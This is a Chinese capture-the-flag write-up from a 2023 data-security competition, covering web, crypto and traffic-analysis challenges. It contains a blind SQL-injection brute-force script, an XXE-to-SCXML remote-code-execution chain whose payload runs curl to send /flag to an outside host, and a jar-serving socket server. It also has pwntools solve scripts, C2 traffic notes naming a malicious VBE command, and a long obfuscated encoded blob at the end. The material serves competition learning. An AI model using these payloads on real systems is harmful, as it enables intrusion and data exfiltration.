2023 数字中国创新大赛网络数据安全产业人才挑战赛 数据安全 数据分析 敏感数据泄露识别 Writeup
博客太久没写了,一直想更新 Yubikey 的教程,但是每次新建 Markdown 都没动力继续写,想来想去还是该写写了,再不写就真的要长蜘蛛网了,所以把前几天的比赛也正好补下 Writeup,正好打进线下了,可以去福州摸摸鱼,挺好
最后欢迎来 NSS 平台做题呀~ https://www.nssctf.cn/
数据安全 Writeup
签到挑战 @Xenny
按照hint传个xxe即可
端口管理系统 @atao & @Xenny
一个登录框,存在SQL注入。
使用Payloadadmin'and(1)--+
返回99999;使用Payloadadmin'and(0)--+
返回0。由此可以获取admin用户的密码,脚本如下(吐槽一下请求时快时慢
import requests
burp0_url = "http://eci-2zecpi6e3euemjqw2s9b.cloudeci1.ichunqiu.com:80/login.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://eci-2zeer6871ouxogqf6i4h.cloudeci1.ichunqiu.com", "Connection": "close", "Referer": "http://eci-2zeer6871ouxogqf6i4h.cloudeci1.ichunqiu.com/", "Upgrade-Insecure-Requests": "1"}
flag = ''
for j in range(1, 11):
for i in range(32, 128):
burp0_data = {"Username": "admin'and(substr(Password,{},1)='{}')-- ".format(j, chr(i)), "Password": "aaa1"}
print burp0_data["Username"]
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
if "99999" in r.text:
flag += chr(i)
print flag
break
if i == 127:
print flag
exit()
获得Password为4uO8TivJHSGnTMV9hUS4qQKn7TRFPhHQt29ylDmRtsqVMtxCFpNysorMPdk9T26G
通过/www.zip
读取源码,发现存在AES加密,lib.php运行得到key和iv,然后ECB解密获得flag{9b39060c-119b-485a-866c-6d1bb069d3d1}
XxME @atao
下载源码进行查看,发现/object
路由调用scxml
这个库。这个东西以前有写过RCE
利用。查看:
并且我的payload并没有用到script
可以说直接Bypass了
接着看看/xxe
路由,就是一个xxe
漏洞。通过 可知,利用xxe可以上传临时缓存文件文件
利用如下脚本,上传一个socket连接的
server.py
import sys
import time
import threading
import socketserver
from urllib.parse import quote
import http.client as httpc
listen_host = '0.0.0.0'
listen_port = 8082
jar_file = sys.argv[1]
class JarRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
http_req = b''
print('New connection:',self.client_address)
while b'\r\n\r\n' not in http_req:
try:
http_req += self.request.recv(4096)
print('Client req:\r\n',http_req.decode())
jf = open(jar_file, 'rb')
contents = jf.read()
headers = ('''HTTP/1.0 200 OK\r\n'''
'''Content-Type: application/java-archive\r\n\r\n''')
self.request.sendall(headers.encode('ascii'))
self.request.sendall(contents[:-1])
time.sleep(45)
print(30)
self.request.sendall(contents[-1:])
except Exception as e:
print ("get error at:"+str(e))
if __name__ == '__main__':
jarserver = socketserver.TCPServer((listen_host,listen_port), JarRequestHandler)
print ('waiting for connection...')
server_thread = threading.Thread(target=jarserver.serve_forever)
server_thread.daemon = True
server_thread.start()
server_thread.join()
1.xml
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0">
<datamodel>
<data id="flag" expr="''.class.forName('java.lang.Runtime').getRuntime().exec('curl -F xx=@/flag http://xxx/')"></data>
</datamodel>
</scxml>
然后使用命令python3 server.py 1.xml
起个监听 配置 2.xml 用于远程加载1.xml
文件
<!DOCTYPE convert [
<!ENTITY remote SYSTEM "jar:http://xxx/2.xml!/1.xml">
]>
<convert>&remote;</convert>
配置 3.xml 用于查看临时文件名
请求 2.xml
然后读取缓存名
然后访问 /object 路由进行利用
flag为flag{3f459b88-db6d-403f-806e-5e40aed7caf0}
key @WDLJT
打开靶机,查看源码,发现pdf文件,访问
发现用户dcic,6位弱口令,尝试爆破,得到密码000000,登录
发现url中存在id参数,尝试遍历,当id=7的时候出现flag
math_exam @Xenny
好久没做RSA,很生疏,卡了好久,其实每个challenge都是给了一个pq的关系式,嗯解方程即可。
from Crypto.Util.number import *
from sympy.abc import p, q
from sympy.solvers import solve
# e = 65537
# c = 112742443814287255411540092433156061065388404049949520959549377871297566383025041892192679147481155020865118811016470498351633875090973546567374001852295013083192495299811476604405637385307524194793969533646755764136014187430115618114840780368311166911900457224593131166970676797547489278410997707815915932756
# n = 121127425328043404860413278637978444801342472819958112597540188142689720655042880213001676368390521140660355813910726809125567752172921410143437643574528335234973793653775043030021036875866776532570781661875022102733555943967261003246543180935987772711036868216508554536086688819118597075508026787867088355603
# leak = 216638862637129382765636503118049146067015523924032194492700294200289728064297722088882791754351329407138196573832392846467607399504585045028165699421278
# res = solve([2*p-2*(q-1)-leak, p*q-n], [p, q])
# p, q = res[1]
# phi = int((p-1)*(q-1))
# d = inverse(e, phi)
# m1 = pow(c, d, n)
# print(long_to_bytes(m1))
# e = 65537
# c = 7964477910021153997178145480752641882728907630831216554750778499596527781702830885213467912351097301767341858663701574005489585561370961723264247818377063081744522471774208105250855114831033452448184392499682147532404562876275189577321587660597603848038824026981539659156304028998137796242331160312370913038
# n = 140571013522095816880929287025269553867630639381779595547026503691829940612178900269986625350464874598461222087427155791855120339533208468121389480964471710028253589422629569889402475311387750348466199387760629889238062977271925350490110043385800605640905324122017637306715108727700910035925728362455954862209
# leak = 58442382248753295429370894053397615609981110383986887405127350139482893508400422595729520437678203735054593866306478994471465948872565590901376309380029015549809468112086393107585011072503638322671608471684607214064187044372418770555236721845694224676090744181562673509234801011420696349507624867568099759003
from tqdm import tqdm
from gmpy2 import *
from multiprocessing import Pool
# def work(s):
# start,end = s
# from sympy.abc import p,q
# for k in tqdm(range(start, end)):
# res = solve([e*(leak-p-q) - 1 - k*(p-1)*(q-1), p*q-n], [p,q])
# if res:
# print(res)
# exit()
# if __name__ == '__main__':
# pool = Pool(16)
# cnt = 16
# xxx = 20000
# pp = []
# pool.map(work, [(xxx + (e-xxx)//cnt * i, xxx + (e-xxx)//cnt * (i+1)) for i in range(cnt)])
# pool.close()
# pool.join()
# p,q = 11313966409861631039478595568321463053854736981799251879142366634260663826785753600795543739453234641363969055017418412140488571150961964028137302877217043, 12424556378351046371185161277482905943559947548618363169705793593589566182588523613116377606937486152883486532821967293124238036618192092197776877669969563
# phi = (p-1)*(q-1)
# d = inverse(e, phi)
# m2 = pow(c, d, n)
# print(long_to_bytes(m2))
e = 65537
c = 54161995127842474543974770981473422085334044100057089719350274921419091368361244533281599379235907845996678762379778310924192757650322930707785543132446159092950451255660204858292974657119337026589911330412367633761103944916751660957776230135927005700707688661350641600954072696774954805514477330339449799540
n = 88207747624007183083381863279444163105330473097729276113333026679597864128605555600000789783468271680476780366740448641311570797876037993255307716167149079618302706650018518487351604778857406170722209469765782625409279109832638886179654096975665134276856272488090272822541461702907181545730309689190333058151
leak = 19596671928335648228117128090384865424885102632642665068992144783391306491716530155291726644158221224616817878768426330717188403310818678195631582453246848
from sympy.solvers import solve
res = solve([p+q-leak, p*q-n], [p,q])
p,q = int(res[0][0]), int(res[0][1])
d = inverse(e, (p-1)*(q-1))
phi = int((p-1)*(q-1))
m3 = pow(c, d, n)
print(long_to_bytes(m3))
lose the key @Xenny
Elgamal就是个幌子,其实认真看代码搞懂逻辑就会做了,有加密和解密功能,解密得到特定值可以得到flag,我们只需要解密一次先得到g^i然后即可得到g^{xr},然后就能构造b=g^{xy}*z从而让解密函数得到z
# from Crypto.PublicKey import ElGamal
# from Crypto.Util.number import bytes_to_long
# d = []
# k = ElGamal.construct(k)
z = 62108754904287032821971381232956885052769068054607609275042182309040123248979381249587936612457114553082984085473302992025047447258976388732555778861072247007820649687902442248057135518944999341930795894210983350234495243479752339988814594642849784670120645449023408944862789781184747815252870664480503695731
from pwn import *
context.log_level = 'debug'
io = remote('101.200.235.163', 25178)
io.recvline()
io.sendlineafter('> ', '1')
line = io.recvline().decode().strip()
p,g,y = list(map(int, line[1:-1].split(',')))
# i_list = ['富强','民主','文明','和谐', '自由','平等','公正','法治','爱国','敬业','诚信','友善']
def inverse(u, v):
"""The inverse of :data:`u` *mod* :data:`v`."""
u3, v3 = u, v
u1, v1 = 1, 0
while v3 > 0:
q = u3 // v3
u1, v1 = v1, u1 - v1*q
u3, v3 = v3, u3 - v3*q
while u1<0:
u1 = u1 + v
return u1
io.sendlineafter('> ', '2')
y2 = int(io.recvline().decode().strip())
io.sendlineafter('> ', '3')
io.sendlineafter('b> ', str(y2))
ix = io.recvline().decode().strip()
ss = [252542145903802, 253646036318395, 253534199519374, 252417592045712, 255669385532593, 252585750015369, 252362294209955, 253658988458683, 254574286183357, 253530525186202, 255840915603361, 252404690163332]
s = ['富强','民主','文明','和谐', '自由','平等','公正','法治','爱国','敬业','诚信','友善']
i = ss[s.index(ix)]
gi = pow(g, i, p)
gxy = y2 * inverse(gi, p)
io.sendlineafter('> ', '3')
io.sendlineafter('b> ', str(z*gxy))
io.interactive()
数据分析 Writeup
区块链威胁分析 @WDLJT
第一问
全局搜索 Identi
我才不会说我一开始没用全局搜索然后翻 hex 翻了20分钟
即可得到 W58CYKFH67
第二问
将压缩包放到 virustotal 分析,得到这个 C2 的家族 - trojan.tradertraitor/nukesped
经查询是该组织
fernet @WDLJT
第一问
经wireshark追踪流分析,获取如下key: 截图寄了,懒得重新截图了总的来说就是 Server 端和 Client 一个 key 一个 token
n6IcHjmQUNOd6TxOkV6WRigEPUZFkO2TIu8cS6MRyrE=
Aj0S2EgsjOFd_JRsOjcBB_5-fZ1H-9tZVF67-qOWCbw=
Z-Ur0AYZQ9-nNO_O6j5B1slASR-YR2tsssycqHNc_so=
eBp92fUD7Lk_6qXR2pIjFt3sBH-lW0ul830S-sO6QCQ=
Erj5UoZfpxT47Bjpg8qg1XmMCKZyKBj1bJ0otszVZPk=
qkwNBcGK7ZcOrlKKcflivlyiatdAsb2u_sH_-IB5R_Y=
0smJ2LvvnQonNICFpjOF8CeuOcMIuYLNVbCDucWSVaw=
第二问
根据压缩包内残破.py文件可知,该加密方式为fernet加密
并且根据 gAAAAA 也能判断是 fernet 的 token
解题脚本如下:
from cryptography.fernet import Fernet
# key = Fernet.generate_key()
key = b'此处填写key'
f = Fernet(key)
token = b'此处填写token'
f.decrypt(token)
print(f.decrypt(token).decode('utf-8'))
解密内容
I'm a hacker. This system has been hacked by me Next, I want to obtain some data 姓名|性别|身份证号|电话|a|b|c 张三,男,340303202304025872,13333333333 性别|姓名|身份证号|电话|a|b|c 女,小美,500112202304217984,12222222222,111111111111,22222,333333 bye?? no!I finally want to transmit a flag data:image/png;base64,这是一串 base64 太长了不想放了 Have fun in Digital China
根据解密内容,按照题目意思,太难过逗号更换为下划线,将张三,男,340303202304025872,13333333333“”进行md5后即为flag
第三问
将得到的 data:image 的 base64 解码后,得到以下图片
上图有类似 flag 字样,使用 stegsolve 检索图层,得到 flag,然后解码,然后我解出这玩意一血还没出,读 flag 读了快 10 分钟,读完就四血了,一血在五分钟前,难蚌。
C2流量分析 @WDLJT
第一问
TCP追踪流,发现16号流存在木马程序流量
payload 完整下载地址即为 http:// + host + path
为了防止误触(因为确实他有恶意行为,虽然大概率会被杀软 gank 掉)我这里就放 VT 的分析链接了:https://www.virustotal.com/gui/url/c9243a6afc614f3e92014b031b3f84d0e3b94efc5aba55c0097517887235828a
第二问
将该流保存为 bin 文件,提取木马文件原始数据,经过 SHA256 得
不过我一开始取巧,因为我 Wireshark 导出的时候一直忘记用 bin 一直用 text 然后就有一堆 0x2E,然后 hash 算不对,把这个丢 VT 上面,发现这个是实际存在的马,然后那个 sha256 居然不是题目的 sha256 ,题目可能是去了毒或者塞了考点什么的,hash 对不上,VT 出来的是这个:e652f9621cb00e0e3b3aa6935bdfa3c6826e3b53facdc55558692e7811dc4fc4
将该值大写,即为本题答案
第三问
将得到的bin文件放入IDA进行逆向分析,查字符串得到该值
向上追踪,得到该应用程序的执行流
得到下一条命令为 cmd.exe /c C:\Users\Public\Documents\2022060125.vbe
第四问
经过分析,需要 base64 解码的 cmd 命令个数为三条,然后虽然他是第四问,但是这个是真的能直接看流量看到的 base64 所以第一解就是做的这个题
挑战区1 Writeup
敏感数据泄露识别 @Xenny
import os
import re
from tqdm import tqdm
import json
data = {}
'''
filename: {
data: [],
meta: {
header: [],
filename: '',
length: 0
},
p_phone: {}
}
'''
varibs = ['phone', 'cert_no', 'school', 'email', 'bank_card']
result = []
valid_phone_prefix = [334,335,336,337,338,339,347,350,351,352,357,358,359,378,382,383,384,387,388,330,331,332,345,355,356,385,386,376,375,333,349,353,380,381,389,377,399,391,393,395,398]
valid_bank_card_prefix = [922,883,165,221,880,584,768,908,197,130,956,500,723,881,886,839,922,335,706,205,132,123,127,766,110,803,322,844,130,641,328,883,667,339,337,794,325,880,571,397,123,958,758,203,291,745,842,981,224,861,839,613,950,787,295,391,702,612,967,618,704,974,136,592,862,917,781,278,662,895,791,856,189,780,211,898,268,961,851,131,581,145,969,730,708,693,763,275,273,615,333,113,890,981,662,338,692,571,776,662,724,847,106,903,978,941,859,929,233,632,897,158,593,991,684,668,617,597,933,102,739,906,728,570,715,129,924,336,751,282,699,286,982,194,918,665,917,972,937,134,962,790,173,186,118,115,873,874,388,213,917,740,290,398,172,272,264,641,273,773,380,764,586,217,125,916,293,212,848,721,937,122,331,119,507,250,137,837,265,619,795,953,326,746,917,562,329,765,132,505,792,923,776,747,161,856,229,997,149,173,980,179,862,263,679,359,234,109,971,139,705,323,684,572,276,948,991,899,738,139,306,202,791,706,299,207,782,500,617,612,118,727,993,389,119,261,306,979,931,902,239,791,199,958,661,958,804,597,887,167,142,187,237,274,271,878,715,619,962,217,399,719,899,833,239,665,889,207,141,175,987,908,251,949,229,218,730,702,901,179,330,680,184,678,218,569,384,211,906,147,948,113,729,787,115,194,218,946,141,293,701,266,219,562,272,798,263,862,206,926,938,203,768,141,128,111,906,844,711,509,165,166]
什么你想要完整脚本,完整脚本好像被不明势力给干扰了,不如来看看这里吧 https://www.ctfer.vip/note/set/1650
5YhN5YzV5Y2t6X+y5YvA5Yln55ls55dR5bBm5bdX6Y+M546c5bFC6Xrw5Lr65c2y5MPa77lZ5nJ95MPa5crv54F26Xrw5Lr65c2y5YdT5oPk57hM5Y2t5MPaPzEyMvOcp192LJkcMS9wMKW0K25iXT4cBtbtVPNtqzSlVQ0tJmpfBFjkZPj1YQtfAPjlYQRfAvjmYQpfBFjkZPj1YQtfAPjlKDbtVPNtqzSlK2yxCIfaZFpfWmNaYPq4WljaBFpfWmtaYPp3WljaAvpfWmHaYPp0WljaZlpfWmVaKDbXVPNtVUA1oFN9VQNXVPNtVNbtVPNtpUWcoaDXPvNtVPOzo3VtnFOcovOlLJ5aMFtjYQR3XGbXVPNtVPNtVPOmqJ0tXm0tnJ50XT5onI0cXaMupygcKDbtVPNtp3IgVPH9VQRkPtbtVPNtpzI0qKWhVUMupy9cMSgmqJ1qVQ09VT5oZGqqYzkiq2IlXPxXPzEyMvOzo3WgLKEsqzSlXUMuoPjtMz9loJS0XGbXVPNtVTyzVTMipz1uqPN9CFNapTuiozHaBtbtVPNtVPNtVUWyplN9VUWyYzMcozEuoTjbW1jbC1jeCmt/Aw9pXG8tClupMUfmsFxhClupMUf0sFxhClupMUf0sFypXQ84CmL/KPx/WljtqzSfXDbtVPNtVPNtVUWyqUIlovNaWl5do2yhXUWyp1fjKFxXVPNtVTIfp2H6PvNtVPNtVPNtpzI0qKWhVUMuoNbXMTIzVUqipzgsMz9lK3EuLzkyXUOuqTtfVTMcoTIhLJ1yXGbXVPNtVTqfo2WuoPOxLKEuPvNtVPOxLKEuJ2McoTIhLJ1yKFN9VUfXVPNtVPNtVPNaMTS0LFp6VR5iozHfPvNtVPNtVPNtW21yqTRaBvO7PvNtVPNtVPNtVPNtVPqznJkyozSgMFp6VTMcoTIhLJ1yPvNtVPNtVPNtsDbtVPNtsDbXVPNtVUqcqTtto3OyovujLKEbYPOyozAiMTyhMm0aqKEzYGtaXFOuplOzBtbtVPNtVPNtVUWiqlN9VTLhpzIuMTkcozHbXF5mqUWcpPtcPvNtVPNtVPNtpz93VQ0tpz93YaAjoTy0XPpfWlyoZGcqPtbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2uyLJEypvqqVQ0tpz93YzAipUxbXDbXVPNtVPNtVPOsMPN9VSgqPtbtVPNtVPNtVTMipvOfnJ5yVTyhVTLhpzIuMTkcozImXPx6PvNtVPNtVPNtVPNtVTkcozHtCFOfnJ5yYaA0pzyjXPxhp3OfnKDbWljaXIfkBy0XVPNtVPNtVPNtVPNtK2DhLKOjMJ5xXTkcozHcPvNtVPNtVPNtPvNtVPNtVPNtoT5aVQ0toTIhXS9xXDbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqxLKEuW10tCFOsMP5wo3O5XPxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFN9VTkhMjbtVPNtVPNtVNbtVPNtVPNtVTMipvOcozEyrPjtnKEyoFOcovOyoaIgMKWuqTHbpz93XGbXVPNtVPNtVPNtVPNtK2DtCFO7sDbtVPNtVPNtVPNtVPOcMvOcqTIgYzkiq2IlXPxtnJ4tqzSlnJWmBtbtVPNtVPNtVPNtVPNtVPNtMz9lVTxtnJ4tpzShM2HboT5aXGbXVPNtVPNtVPNtVPNtVPNtVPNtVPOsMSgzo3WgLKEsqzSlXTEuqTSoMzyfMJ5uoJIqJlqxLKEuW11onI1onJ5xMKuqYPOcqTIgYzkiq2IlXPxcKFN9VTxXVPNtVPNtVPNtVPNtMTS0LIgznJkyozSgMI1oMvqjK3gcqTIgYzkiq2IlXPy9W10tCFOsMP5wo3O5XPxXPzEyMvOfo2AuqTIsMzyfMFu2LJjfVPO0rKOyXGbXVPNtVTqfo2WuoPOxLKEuPvNtVPOzqzSfVQ0tMz9loJS0K3Mupvu2LJjfVUE5pTHcPvNtVPOzo3Vtn2I5VTyhVTEuqTR6PvNtVPNtVPNtnJLtqUyjMFOcovOxLKEuJ2gyrI1oW21yqTRaKIfanTIuMTIlW106PvNtVPNtVPNtVPNtVTyxrPN9VTEuqTSon2I5KIgzW3Osr3E5pTI9W10hM2I0XTM2LJjfVR5iozHcPvNtVPNtVPNtVPNtVUOiplN9VTEuqTSon2I5KIfaoJI0LFqqJlqbMJSxMKVaKF5cozEyrPu0rKOyXDbtVPNtVPNtVPNtVPOcMvOcMUttnKZtoz90VR5iozH6PvNtVPNtVPNtVPNtVPNtVPOlMKE1pz4tXTgyrFjtqUyjMFjtMTS0LIgeMKyqJlqxLKEuW11onJE4KIgjo3AqXDbtVPNtVPNtVPNtVPNtVPNtPtcxMJLtoTIun3qipzgsMz9lK3EuLzkyXUOuqTtfVTMcoTIhLJ1yXGbXVPNtVTqfo2WuoPOlMKA1oUDXVPNtVUqcqTtto3OyovujLKEbYPOyozAiMTyhMm0aqKEzYGtaXFOuplOzBtbtVPNtVPNtVUWiqlN9VTLhpzIuMTkcozHbXF5mqUWcpPtcPvNtVPNtVPNtpz93VQ0tpz93YaAjoTy0XPpfWlyoZGcqPtbtVPNtVPNtVS9xVQ0tJ10XPvNtVPNtVPNtMz9lVTkcozHtnJ4tMv5lMJSxoTyhMKZbXGbXVPNtVPNtVPNtVPNtoTyhMFN9VTkcozHhp3ElnKNbXF5mpTkcqPtaYPpcPvNtVPNtVPNtVPNtVS9xYzSjpTIhMPufnJ5yXDbtVPNtVPNtVTkhMlN9VTkyovusMPxXPvNtVPNtVPNtMz9lVTyhMTI4YPOcqTIgVTyhVTIhqJ1ypzS0MFulo3pcBtbtVPNtVPNtVPNtVPOcMvOcqTIgYzkiq2IlXPxtnJ4tqzSlnJWmBtbtVPNtVPNtVPNtVPNtVPNtMz9lVTxtnJ4tpzShM2HboT5aXGbXVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKZtCFOfo2AuqTIsMzyfMFusMSgcKIgcozEyrPfkKFjtnKEyoF5fo3qypvtcXDbtVPNtVPNtVPNtVPNtVPNtVPNtVTyzVUWyplOcplOho3DtGz9hMGbXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVlOjpzyhqPulMKZcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUWyp3IfqP5upUOyozDbWlNaYzcinJ4bXTMcoTIhLJ1yYPxepzImXFNeVPqpovpcPtcxMJLtpTSlp2IsL29hqTIhqPufnJ5yplx6PvNtVPOcMvOfMJ4boTyhMKZcVQ09VQR6PvNtVPNtVPNtnJLtoTyhMKAoZS1oZS0tCG0tW3faBtbtVPNtVPNtVPNtVPOfnJ5yplN9VTkcozImJmOqYaA0pzyjXPxhp3OfnKDbWlO7WlxXVPNtVPNtVPNtVPNtPvNtVPNtVPNtVPNtVS9xVQ0tJjbtVPNtVPNtVPNtVPNtVPNtnaAiov5fo2SxplufnJ5yp1fjKFxXVPNtVPNtVPNtVPNtKDbtVPNtVPNtVPNtVPOzo3Vt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o3qypvtcsFqqVQ0tK2DhL29jrFtcPvNtVPOyoTyzVUE5pTHtCG0tW2cmo24aBtbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2uyLJEypvqqVQ0toTymqPuwo250MJ50JmOqYzgyrKZbXFxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFN9VTkyovuwo250MJ50XDbtVPNtVPNtVNbtVPNtVPNtVTkcozImVQ0tJ10XVPNtVPNtVPOzo3VtoTyhMFOcovOwo250MJ50BtbtVPNtVPNtVPNtVPOsoPN9VSgqPvNtVPNtVPNtVPNtVTMipvOcqTIgVTyhVTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2uyLJEypvqqBtbtVPNtVPNtVPNtVPNtVPNtK2jhLKOjMJ5xXTkcozIonKEyoI0cPvNtVPNtVPNtVPNtVTkcozImYzSjpTIhMPusoPxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqVQ0toTyhMKZhL29jrFtcPtbtVPNtVPNtVTMipvOcozEyrPjtnKEyoFOcovOyoaIgMKWuqTHbMTS0LIgznJkyozSgMI1oW21yqTRaKIfanTIuMTIlW10cBtbtVPNtVPNtVPNtVPOsMPN9VUg9PvNtVPNtVPNtVPNtVTyzVTy0MJ0hoT93MKVbXFOcovO2LKWcLaZ6PvNtVPNtVPNtVPNtVPNtVPOzo3VtnFOcovOlLJ5aMFuxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFx6PvNtVPNtVPNtVPNtVPNtVPNtVPNtK2EoMz9loJS0K3Mupvu